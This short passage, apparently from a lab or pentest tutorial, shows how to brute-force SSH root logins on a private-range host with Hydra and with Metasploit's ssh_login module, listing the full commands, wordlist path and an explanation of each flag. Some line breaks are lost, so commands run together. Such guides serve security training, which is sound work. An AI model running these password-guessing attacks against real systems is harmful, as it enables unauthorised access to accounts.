Using Hydra:
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.218.129:22 -t 4 -V-L to specify user (root)
-P to specify wordlist (wordlist path included)
ssh to say we’re attacking ssh and target IP + Port
-t for how many threads (4 in this case)
-V for verbosity; seeing every single attempt happen
Using Metasploit:
use auxiliary/scanner/ssh/ssh_loginIf you don’t know what, you can:
search sshto find ssh auxiliary modules
using the module:
set username rootset pass_file /usr/share/wordlists/metasploit/unix_passwords.txtset rhosts 192.168.218.129